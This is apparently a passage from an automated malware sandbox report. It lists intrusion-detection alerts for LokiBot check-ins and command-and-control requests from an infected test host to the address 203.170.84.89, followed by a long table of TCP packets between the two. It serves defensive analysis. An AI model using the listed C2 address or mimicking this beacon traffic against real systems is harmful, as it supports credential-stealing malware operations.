                                          02/22/21-19:14:51.621970TCP2025381ET TROJAN LokiBot Checkin4985480192.168.2.4203.170.84.89
                                          02/22/21-19:14:52.907812TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985580192.168.2.4203.170.84.89
                                          02/22/21-19:14:52.907812TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985580192.168.2.4203.170.84.89
                                          02/22/21-19:14:52.907812TCP2025381ET TROJAN LokiBot Checkin4985580192.168.2.4203.170.84.89
                                          02/22/21-19:14:54.200425TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985680192.168.2.4203.170.84.89
                                          02/22/21-19:14:54.200425TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985680192.168.2.4203.170.84.89
                                          02/22/21-19:14:54.200425TCP2025381ET TROJAN LokiBot Checkin4985680192.168.2.4203.170.84.89
                                          02/22/21-19:14:55.486345TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985780192.168.2.4203.170.84.89
                                          02/22/21-19:14:55.486345TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985780192.168.2.4203.170.84.89
                                          02/22/21-19:14:55.486345TCP2025381ET TROJAN LokiBot Checkin4985780192.168.2.4203.170.84.89
                                          02/22/21-19:14:56.748663TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985880192.168.2.4203.170.84.89
                                          02/22/21-19:14:56.748663TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985880192.168.2.4203.170.84.89
                                          02/22/21-19:14:56.748663TCP2025381ET TROJAN LokiBot Checkin4985880192.168.2.4203.170.84.89

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Feb 22, 2021 19:13:01.722322941 CET4974580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:02.068474054 CET8049745203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:02.068581104 CET4974580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:02.072160959 CET4974580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:02.419821978 CET8049745203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:02.422183037 CET4974580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:02.768070936 CET8049745203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:02.801673889 CET8049745203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:02.801837921 CET8049745203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:02.802093983 CET4974580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:02.802150011 CET4974580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:03.116241932 CET4974780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:03.147840977 CET8049745203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:03.452878952 CET8049747203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:03.453000069 CET4974780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:03.456110954 CET4974780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:03.791208982 CET8049747203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:03.791301966 CET4974780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:04.125984907 CET8049747203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:04.158847094 CET8049747203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:04.159040928 CET8049747203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:04.159228086 CET4974780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:04.159281015 CET4974780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:04.331841946 CET4974980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:04.493936062 CET8049747203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:04.670717001 CET8049749203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:04.670828104 CET4974980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:04.676480055 CET4974980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:05.014862061 CET8049749203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:05.014952898 CET4974980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:05.354441881 CET8049749203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:05.396814108 CET8049749203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:05.397056103 CET8049749203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:05.397253990 CET4974980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:05.397555113 CET4974980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:05.704830885 CET4975080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:05.737412930 CET8049749203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:06.043128014 CET8049750203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:06.046210051 CET4975080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:06.053559065 CET4975080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:06.391633034 CET8049750203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:06.392352104 CET4975080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:06.730252028 CET8049750203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:06.769673109 CET8049750203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:06.769746065 CET8049750203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:06.769833088 CET4975080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:06.769897938 CET4975080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:07.067527056 CET4975180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:07.107938051 CET8049750203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:07.405133963 CET8049751203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:07.405369043 CET4975180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:07.581440926 CET4975180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:07.923216105 CET8049751203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:07.923393965 CET4975180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:08.261207104 CET8049751203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:08.297547102 CET8049751203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:08.297693968 CET8049751203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:08.297844887 CET4975180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:08.754415035 CET4975180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:09.036272049 CET4975280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:09.091958046 CET8049751203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:09.373982906 CET8049752203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:09.374150991 CET4975280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:09.379899025 CET4975280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:09.717824936 CET8049752203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:09.717972994 CET4975280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:10.057297945 CET8049752203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:10.094573975 CET8049752203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:10.094821930 CET4975280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:10.095177889 CET8049752203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:10.095268965 CET4975280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:10.411180973 CET4975380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:10.433692932 CET8049752203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:10.745512009 CET8049753203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:10.746390104 CET4975380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:10.753897905 CET4975380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:11.089250088 CET8049753203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:11.089572906 CET4975380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:11.423415899 CET8049753203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:11.455200911 CET8049753203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:11.455538988 CET8049753203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:11.455585003 CET4975380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:11.455646038 CET4975380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:11.787161112 CET4975480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:11.789374113 CET8049753203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:12.124365091 CET8049754203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:12.124721050 CET4975480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:12.128792048 CET4975480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:12.465698957 CET8049754203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:12.465974092 CET4975480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:12.802908897 CET8049754203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:12.833798885 CET8049754203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:12.833843946 CET8049754203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:12.833997965 CET4975480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:12.834304094 CET4975480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:13.102169991 CET4975580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:13.171260118 CET8049754203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:13.439296007 CET8049755203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:13.439465046 CET4975580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:13.445902109 CET4975580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:13.780642033 CET8049755203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:13.780885935 CET4975580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:14.115390062 CET8049755203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:14.146862984 CET8049755203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:14.147129059 CET8049755203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:14.147218943 CET4975580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:14.147289991 CET4975580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:14.413026094 CET4975680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:14.484185934 CET8049755203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:14.748071909 CET8049756203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:14.748253107 CET4975680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:14.755155087 CET4975680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:15.090065956 CET8049756203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:15.090272903 CET4975680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:15.426881075 CET8049756203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:15.458630085 CET8049756203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:15.458960056 CET8049756203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:15.458975077 CET4975680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:15.459064007 CET4975680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:15.755651951 CET4975780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:15.793590069 CET8049756203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:16.090509892 CET8049757203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:16.090735912 CET4975780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:16.098573923 CET4975780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:16.432708979 CET8049757203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:16.432831049 CET4975780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:16.767677069 CET8049757203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:16.800559998 CET8049757203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:16.800817013 CET8049757203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:16.801059961 CET4975780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:16.801105976 CET4975780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:17.065048933 CET4975880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:17.135082960 CET8049757203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:17.399919987 CET8049758203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:17.400228977 CET4975880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:17.407438040 CET4975880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:17.742444038 CET8049758203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:17.742592096 CET4975880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:18.077526093 CET8049758203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:18.107852936 CET8049758203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:18.108020067 CET8049758203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:18.108274937 CET4975880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:18.108316898 CET4975880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:18.401227951 CET4975980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:18.445224047 CET8049758203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:18.735865116 CET8049759203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:18.736078024 CET4975980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:18.738996983 CET4975980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:19.073792934 CET8049759203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:19.073930979 CET4975980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:19.410026073 CET8049759203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:19.442205906 CET8049759203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:19.442343950 CET8049759203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:19.442392111 CET4975980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:19.442436934 CET4975980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:19.702821970 CET4976080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:19.777086973 CET8049759203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:20.038129091 CET8049760203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:20.039377928 CET4976080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:20.041934967 CET4976080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:20.379132032 CET8049760203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:20.379368067 CET4976080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:20.714682102 CET8049760203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:20.749983072 CET8049760203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:20.750186920 CET8049760203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:20.750284910 CET4976080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:20.751328945 CET4976080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:20.986237049 CET4976380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:21.084209919 CET8049760203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:21.330612898 CET8049763203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:21.330755949 CET4976380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:21.333542109 CET4976380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:21.678126097 CET8049763203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:21.678217888 CET4976380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:22.022650003 CET8049763203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:22.060681105 CET8049763203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:22.060791969 CET8049763203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:22.060870886 CET4976380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:22.060893059 CET4976380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:22.326782942 CET4976480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:22.405149937 CET8049763203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:22.662787914 CET8049764203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:22.666702986 CET4976480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:22.669300079 CET4976480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:23.004756927 CET8049764203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:23.005808115 CET4976480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:23.342444897 CET8049764203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:23.380831003 CET8049764203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:23.381267071 CET8049764203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:23.381556988 CET4976480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:23.381613016 CET4976480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:23.661341906 CET4976580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:23.715451002 CET8049764203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:24.008467913 CET8049765203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:24.008788109 CET4976580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:24.013552904 CET4976580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:24.359091043 CET8049765203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:24.359314919 CET4976580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:24.704896927 CET8049765203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:24.744710922 CET8049765203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:24.744851112 CET8049765203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:24.745059967 CET4976580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:24.752625942 CET4976580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:25.015988111 CET4976680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:25.097785950 CET8049765203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:25.350769043 CET8049766203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:25.350940943 CET4976680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:25.353621006 CET4976680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:25.688349962 CET8049766203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:25.689847946 CET4976680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:26.024589062 CET8049766203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:26.056929111 CET8049766203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:26.057013988 CET8049766203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:26.057090998 CET4976680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:26.057135105 CET4976680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:26.393157959 CET8049766203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:26.616674900 CET4976780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:26.950714111 CET8049767203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:26.950912952 CET4976780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:26.968743086 CET4976780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:27.304668903 CET8049767203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:27.304826021 CET4976780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:27.640516996 CET8049767203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:27.672360897 CET8049767203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:27.672501087 CET8049767203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:27.672765970 CET4976780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:27.676024914 CET4976780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:27.935020924 CET4976880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:28.009938955 CET8049767203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:28.275243998 CET8049768203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:28.275461912 CET4976880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:28.278127909 CET4976880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:28.616240025 CET8049768203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:28.616413116 CET4976880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:28.954262972 CET8049768203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:28.982165098 CET8049768203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:28.982373953 CET4976880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:28.982688904 CET8049768203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:28.982788086 CET4976880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:29.242129087 CET4976980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:29.320180893 CET8049768203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:29.576837063 CET8049769203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:29.577001095 CET4976980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:29.579658985 CET4976980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:29.915239096 CET8049769203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:29.916177034 CET4976980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:30.252321005 CET8049769203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:30.280127048 CET8049769203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:30.280208111 CET8049769203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:30.280438900 CET4976980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:30.280510902 CET4976980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:30.549227953 CET4977080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:30.617152929 CET8049769203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:30.889718056 CET8049770203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:30.889955044 CET4977080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:30.894737959 CET4977080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:31.232312918 CET8049770203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:31.232486963 CET4977080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:31.570513010 CET8049770203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:31.604202986 CET8049770203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:31.604316950 CET8049770203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:31.604537010 CET4977080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:31.604582071 CET4977080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:31.843086004 CET4977180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:31.941739082 CET8049770203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:32.181655884 CET8049771203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:32.181778908 CET4977180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:32.184418917 CET4977180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:32.523078918 CET8049771203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:32.523749113 CET4977180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:32.862390041 CET8049771203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:32.894319057 CET8049771203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:32.894535065 CET8049771203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:32.894649982 CET4977180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:32.894702911 CET4977180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:33.148340940 CET4977280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:33.234484911 CET8049771203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:33.486393929 CET8049772203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:33.487659931 CET4977280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:33.518151999 CET4977280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:33.856565952 CET8049772203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:33.856682062 CET4977280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:34.197129965 CET8049772203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:34.233598948 CET8049772203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:34.233731985 CET4977280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:34.233937025 CET8049772203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:34.234014034 CET4977280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:34.476284981 CET4977380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:34.571679115 CET8049772203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:34.811100960 CET8049773203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:34.811291933 CET4977380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:34.813981056 CET4977380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:35.148715019 CET8049773203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:35.148798943 CET4977380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:35.483243942 CET8049773203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:35.516104937 CET8049773203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:35.516218901 CET4977380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:35.516390085 CET8049773203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:35.516454935 CET4977380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:35.751740932 CET4977480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:35.850940943 CET8049773203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:36.090656042 CET8049774203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:36.092713118 CET4977480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:36.095386982 CET4977480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:36.434298038 CET8049774203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:36.434465885 CET4977480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:36.772480011 CET8049774203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:36.808944941 CET8049774203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:36.809072971 CET8049774203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:36.809089899 CET4977480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:36.809144020 CET4977480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:37.037193060 CET4977780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:37.146209955 CET8049774203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:37.371900082 CET8049777203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:37.372172117 CET4977780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:37.374891996 CET4977780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:37.711095095 CET8049777203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:37.711201906 CET4977780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:38.045665026 CET8049777203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:38.080215931 CET8049777203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:38.080427885 CET4977780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:38.080514908 CET8049777203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:38.080599070 CET4977780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:38.346273899 CET4978180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:38.415015936 CET8049777203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:38.680960894 CET8049781203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:13:38.681087971 CET4978180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:13:38.688700914 CET4978180192.168.2.4203.170.84.89
